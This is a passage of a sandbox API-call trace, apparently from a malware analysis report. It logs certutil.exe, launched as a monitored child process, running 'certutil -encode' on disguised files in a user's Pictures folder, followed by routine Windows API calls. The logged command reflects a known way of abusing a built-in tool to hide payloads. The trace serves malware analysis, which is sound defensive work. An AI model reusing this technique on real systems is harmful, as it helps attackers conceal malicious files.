ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdeb5675e, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x6b6c)) returned 1 [0302.158] _vsnwprintf (in: _Buffer=0x971b1ef288, _BufferCount=0xb, _Format="%d", _ArgList=0x971b1ef278 | out: _Buffer="361") returned 3 [0302.158] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x971b1ef040, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0302.158] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1eff4361860 [0302.158] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.158] _vsnwprintf (in: _Buffer=0x971b1ee270, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x971b1ef2c8 | out: _Buffer="Output Length = 27500") returned 21 [0302.158] GetFileType (hFile=0x50) returned 0x2 [0302.158] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x971b1ee270*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x971b1ee224, lpReserved=0x0 | out: lpBuffer=0x971b1ee270*, lpNumberOfCharsWritten=0x971b1ee224*=0x15) returned 1 [0302.160] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.160] _vsnwprintf (in: _Buffer=0x971b1ee270, _BufferCount=0x1ff, _Format="\n", _ArgList=0x971b1ef2c8 | out: _Buffer="\n") returned 1 [0302.160] GetFileType (hFile=0x50) returned 0x2 [0302.160] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x971b1ee270*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x971b1ee224, lpReserved=0x0 | out: lpBuffer=0x971b1ee270*, lpNumberOfCharsWritten=0x971b1ee224*=0x1) returned 1 [0302.165] LocalFree (hMem=0x1eff4361de0) returned 0x0 [0302.166] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0302.166] _vsnwprintf (in: _Buffer=0x971b1ef2e8, _BufferCount=0xb, _Format="%d", _ArgList=0x971b1ef2d8 | out: _Buffer="2022") returned 4 [0302.166] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x971b1ef0a0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0302.166] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1eff4338be0 [0302.166] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.166] _vsnwprintf (in: _Buffer=0x971b1ee2d0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x971b1ef328 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0302.166] GetFileType (hFile=0x50) returned 0x2 [0302.166] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x971b1ee2d0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x971b1ee284, lpReserved=0x0 | out: lpBuffer=0x971b1ee2d0*, lpNumberOfCharsWritten=0x971b1ee284*=0x31) returned 1 [0302.167] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.167] _vsnwprintf (in: _Buffer=0x971b1ee2d0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x971b1ef328 | out: _Buffer="\n") returned 1 [0302.167] GetFileType (hFile=0x50) returned 0x2 [0302.167] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x971b1ee2d0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x971b1ee284, lpReserved=0x0 | out: lpBuffer=0x971b1ee2d0*, lpNumberOfCharsWritten=0x971b1ee284*=0x1) returned 1 [0302.173] LocalFree (hMem=0x0) returned 0x0 [0302.173] LocalFree (hMem=0x1eff4338520) returned 0x0 [0302.173] LocalFree (hMem=0x1eff43343e0) returned 0x0 [0302.173] SetLastError (dwErrCode=0x80070716) [0302.173] _vsnwprintf (in: _Buffer=0x971b1ef358, _BufferCount=0xb, _Format="%d", _ArgList=0x971b1ef348 | out: _Buffer="511") returned 3 [0302.173] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x971b1ef110, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0302.173] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1eff4361b90 [0302.173] PostQuitMessage (nExitCode=0) [0302.174] GetMessageW (in: lpMsg=0x971b1ef950, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x971b1ef950) returned 0 [0302.174] LocalFree (hMem=0x1eff434e2e0) returned 0x0 [0302.174] LocalFree (hMem=0x1eff4361800) returned 0x0 [0302.174] LocalFree (hMem=0x0) returned 0x0 [0302.174] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0302.174] GetLastError () returned 0x7e [0302.175] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0302.175] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0302.175] DllMain () returned 0x1 [0302.175] LocalFree (hMem=0x1eff434e160) returned 0x0 [0302.175] LocalFree (hMem=0x1eff4355620) returned 0x0 [0302.175] LocalFree (hMem=0x1eff43616e0) returned 0x0 [0302.175] LocalFree (hMem=0x1eff4361860) returned 0x0 [0302.175] LocalFree (hMem=0x1eff4338be0) returned 0x0 [0302.175] LocalFree (hMem=0x1eff4361b90) returned 0x0 [0302.175] LocalFree (hMem=0x1eff4342d60) returned 0x0 [0302.175] LocalFree (hMem=0x1eff4355b60) returned 0x0 [0302.175] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0302.175] GetLastError () returned 0x7e [0302.176] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0302.176] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0302.176] DllMain () returned 0x1 [0302.176] exit (_Code=0) Thread: id = 134 os_tid = 0x3b8 Process: id = "54" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x9940000" os_pid = "0x1154" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"tust f-S-Eq-29XvQ_R.png.Sister\" \"tust f-S-Eq-29XvQ_R.png.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 135 os_tid = 0xc1c [0302.539] GetStartupInfoW (in: lpStartupInfo=0x3fe75af7d0 | out: lpStartupInfo=0x3fe75af7d0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"tust f-S-Eq-29XvQ_R.png.Sister\" \"tust f-S-Eq-29XvQ_R.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0302.542] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0302.542] __set_app_type (_Type=0x1) [0302.542] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0302.542] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0302.545] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0302.545] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0302.545] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0302.546] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0302.546] WerSetFlags () returned 0x0 [0302.546] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0302.546] __iob_func () returned 0x7ffcea2dea00 [0302.546] _fileno (_File=0x7ffcea2dea30) returned 1 [0302.546] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0302.546] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0302.548] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0302.548] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0302.548] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0302.548] GetConsoleOutputCP () returned 0x1b5 [0302.549] _vsnwprintf (in: _Buffer=0x3fe75af740, _BufferCount=0xb, _Format=".%d", _ArgList=0x3fe75af668 | out: _Buffer=".437") returned 4 [0302.549] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0302.549] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.549] GetFileType (hFile=0x50) returned 0x2 [0302.549] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0302.549] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0302.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0302.550] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0302.550] GetCommandLineW () returned="certutil -encode \"tust f-S-Eq-29XvQ_R.png.Sister\" \"tust f-S-Eq-29XvQ_R.png.Cruel\"" [0302.550] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1d1f94fb380 [0302.550] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1d1f94ecdb0 [0302.550] LocalFree (hMem=0x1d1f94fb380) returned 0x0 [0302.551] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1d1f94ebce0 [0302.551] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1d1f94ec340 [0302.551] LocalFree (hMem=0x1d1f94ebce0) returned 0x0 [0302.551] LocalFree (hMem=0x1d1f94ecdb0) returned 0x0 [0302.551] LocalFree (hMem=0x0) returned 0x0 [0302.551] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0302.551] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0302.552] GetCommandLineW () returned="certutil -encode \"tust f-S-Eq-29XvQ_R.png.Sister\" \"tust f-S-Eq-29XvQ_R.png.Cruel\"" [0302.552] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1d1f94fb860 [0302.552] GetSystemTime (in: lpSystemTime=0x3fe75af430 | out: lpSystemTime=0x3fe75af430*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0x11, wMilliseconds=0x5c)) [0302.552] SystemTimeToFileTime (in: lpSystemTime=0x3fe75af430, lpFileTime=0x3fe75af428 | out: lpFileTime=0x3fe75af428) returned 1 [0302.552] FileTimeToLocalFileTime (in: lpFileTime=0x3fe75af428, lpLocalFileTime=0x3fe75af3f0 | out: lpLocalFileTime=0x3fe75af3f0) returned 1 [0302.552] FileTimeToSystemTime (in: lpFileTime=0x3fe75af3f0, lpSystemTime=0x3fe75af160 | out: lpSystemTime=0x3fe75af160) returned 1 [0302.552] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x3fe75af160, lpFormat=0x0, lpDateStr=0x3fe75af270, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0302.552] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x3fe75af160, lpFormat=0x0, lpTimeStr=0x3fe75af170, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0302.552] _vsnwprintf (in: _Buffer=0x3fe75af17e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x3fe75af148 | out: _Buffer=" 17.092s") returned 8 [0302.552] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1d1f94fe0c0 [0302.552] SetLastError (dwErrCode=0x80070716) [0302.553] _vsnwprintf (in: _Buffer=0x3fe75af1f8, _BufferCount=0xb, _Format="%d", _ArgList=0x3fe75af1e8 | out: _Buffer="948") returned 3 [0302.553] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x3fe75aefb0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0302.553] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1d1f94fb7a0 [0302.553] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1d1f9504c80 [0302.553] LocalFree (hMem=0x1d1f94fe0c0) returned 0x0 [0302.553] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3fe75af4a0 | out: lpSystemTimeAsFileTime=0x3fe75af4a0*(dwLowDateTime=0xdef1cd8a, dwHighDateTime=0x1d6141f)) [0302.553] GetLocalTime (in: lpSystemTime=0x3fe75af4d8 | out: lpSystemTime=0x3fe75af4d8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0x11, wMilliseconds=0x5d)) [0302.553] SystemTimeToFileTime (in: lpSystemTime=0x3fe75af4d8, lpFileTime=0x3fe75af4b0 | out: lpFileTime=0x3fe75af4b0) returned 1 [0302.554] CompareFileTime (lpFileTime1=0x3fe75af4b0, lpFileTime2=0x3fe75af4a0) returned 1 [0302.554] _vsnwprintf (in: _Buffer=0x3fe75af4e8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x3fe75af478 | out: _Buffer="GMT + 2.00") returned 10 [0302.554] LocalFree (hMem=0x1d1f94fb860) returned 0x0 [0302.554] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0302.554] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0302.554] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0302.554] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0302.554] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0302.554] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x3fe75af518 | out: _Buffer="10.0.15063.447") returned 14 [0302.554] GetACP () returned 0x4e4 [0302.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0302.554] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1d1f94fb5e0 [0302.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1d1f94fb5e0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0302.555] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1d1f94fe140 [0302.555] _vsnwprintf (in: _Buffer=0x1d1f94fe140, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x3fe75af568 | out: _Buffer="10.0.15063.447 retail") returned 21 [0302.555] LocalFree (hMem=0x1d1f94fb5e0) returned 0x0 [0302.555] LocalFree (hMem=0x0) returned 0x0 [0302.555] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0302.555] GetACP () returned 0x4e4 [0302.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0302.555] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1d1f94fb6a0 [0302.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1d1f94fb6a0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0302.555] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1d1f94fdcc0 [0302.555] _vsnwprintf (in: _Buffer=0x1d1f94fdcc0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x3fe75af568 | out: _Buffer="10.0.15063.447 retail") returned 21 [0302.555] LocalFree (hMem=0x1d1f94fb6a0) returned 0x0 [0302.555] LocalFree (hMem=0x0) returned 0x0 [0302.555] GetACP () returned 0x4e4 [0302.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0302.555] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1d1f94fb9e0 [0302.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1d1f94fb9e0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0302.555] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1d1f94fe040 [0302.555] _vsnwprintf (in: _Buffer=0x1d1f94fe040, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x3fe75af598 | out: _Buffer="10.0.15063.447 retail") returned 21 [0302.555] LocalFree (hMem=0x1d1f94fb9e0) returned 0x0 [0302.556] LocalFree (hMem=0x1d1f94fe140) returned 0x0 [0302.556] LocalFree (hMem=0x1d1f94fdcc0) returned 0x0 [0302.556] LocalFree (hMem=0x1d1f94fe040) returned 0x0 [0302.556] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0302.556] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0302.556] GetStockObject (i=0) returned 0x900010 [0302.556] RegisterClassW (lpWndClass=0x3fe75af6c0) returned 0xc1a2 [0302.556] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2a02c8 [0302.574] NtdllDefWindowProc_W () returned 0x0 [0302.574] NtdllDefWindowProc_W () returned 0x1 [0302.583] NtdllDefWindowProc_W () returned 0x0 [0302.595] UpdateWindow (hWnd=0x2a02c8) returned 1 [0302.595] PostMessageW (hWnd=0x2a02c8, Msg=0x400, wParam=0x0, lParam=0x1d1f94e217e) returned 1 [0302.595] GetMessageW (in: lpMsg=0x3fe75af710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3fe75af710) returned 1 [0302.595] TranslateMessage (lpMsg=0x3fe75af710) returned 0 [0302.595] DispatchMessageW (lpMsg=0x3fe75af710) returned 0x0 [0302.595] NtdllDefWindowProc_W () returned 0x0 [0302.595] GetMessageW (in: lpMsg=0x3fe75af710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3fe75af710) returned 1 [0302.595] TranslateMessage (lpMsg=0x3fe75af710) returned 0 [0302.595] DispatchMessageW (lpMsg=0x3fe75af710) returned 0x0 [0302.595] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x1d1f94f0820 [0302.595] LocalAlloc (uFlags=0x0, uBytes=0xa6) returned 0x1d1f94e4440 [0302.596] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0302.596] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0302.596] SetLastError (dwErrCode=0x80070716) [0302.596] _vsnwprintf (in: _Buffer=0x3fe75af118, _BufferCount=0xb, _Format="%d", _ArgList=0x3fe75af108 | out: _Buffer="465") returned 3 [0302.596] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x3fe75aeed0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0302.596] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1d1f94ec040 [0302.596] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0302.596] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0302.596] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x3fe75aeeb0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0302.596] GetLastError () returned 0xcb [0302.597] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0302.597] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0302.597] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0302.597] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0302.597] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0302.597] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0302.597] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0302.597] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0302.597] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0302.597] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0302.597] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0302.597] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0302.597] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0302.597] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0302.597] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0302.597] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0302.597] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0302.597] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0302.597] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0302.598] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0302.598] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0302.598] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x3fe75aeb78 | out: phkResult=0x3fe75aeb78*=0x23c) returned 0x0 [0302.598] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1d1f94e95c0 [0302.598] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x3fe75af0e8, lpData=0x3fe75af118, lpcbData=0x3fe75af0e0*=0x4 | out: lpType=0x3fe75af0e8*=0x0, lpData=0x3fe75af118*=0x0, lpcbData=0x3fe75af0e0*=0x4) returned 0x2 [0302.598] LocalFree (hMem=0x1d1f94e95c0) returned 0x0 [0302.598] RegCloseKey (hKey=0x23c) returned 0x0 [0302.598] LocalFree (hMem=0x0) returned 0x0 [0302.598] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1d1f950e5b0 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0302.614] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0302.614] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0302.614] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1d1f95120f0 [0302.614] GetComputerNameW (in: lpBuffer=0x1d1f95120f0, nSize=0x3fe75af0e0 | out: lpBuffer="NQDPDE", nSize=0x3fe75af0e0) returned 1 [0302.615] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x3fe75af0b0 | out: lpBuffer=0x0, nSize=0x3fe75af0b0) returned 0 [0302.615] GetLastError () returned 0xea [0302.615] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1d1f94fb920 [0302.615] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1d1f94fb920, nSize=0x3fe75af0b0 | out: lpBuffer="NQdPdE", nSize=0x3fe75af0b0) returned 1 [0302.615] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0302.619] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1d1f95122b0, cbCertEncoded=0x10023) returned 0x0 [0302.624] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1d1f95122b0, cbCrlEncoded=0x10023) returned 0x0 [0302.626] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1d1f95122b0, cbEncoded=0x10023, dwFlags=0x8000, pDecodePara=0x3fe75aef90, pvStructInfo=0x3fe75af020, pcbStructInfo=0x3fe75af014 | out: pvStructInfo=0x3fe75af020, pcbStructInfo=0x3fe75af014) returned 0 [0302.626] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1d1f95122b0, cbEncoded=0x10023, dwFlags=0x8000, pDecodePara=0x3fe75aef90, pvStructInfo=0x3fe75af020, pcbStructInfo=0x3fe75af014 | out: pvStructInfo=0x3fe75af020, pcbStructInfo=0x3fe75af014) returned 0 [0302.627] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1d1f95122b0, cbEncoded=0x10023, dwFlags=0x8000, pDecodePara=0x3fe75aef90, pvStructInfo=0x3fe75af020, pcbStructInfo=0x3fe75af014 | out: pvStructInfo=0x3fe75af020, pcbStructInfo=0x3fe75af014) returned 0 [0302.627] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, 